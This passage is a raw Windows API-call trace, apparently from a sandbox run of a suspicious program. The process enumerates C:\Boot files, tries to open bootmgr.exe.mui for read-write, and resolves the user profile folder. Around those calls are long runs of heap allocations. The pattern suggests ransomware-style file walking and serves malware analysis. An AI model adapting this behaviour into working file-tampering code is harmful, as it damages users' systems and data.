ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.000] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0179.000] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.002] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.002] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.003] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.003] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.042] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0179.042] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.042] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.042] PathFindFileNameW (pszPath="") returned="" [0179.042] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.043] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.043] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.043] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.044] PathAppendW (in: 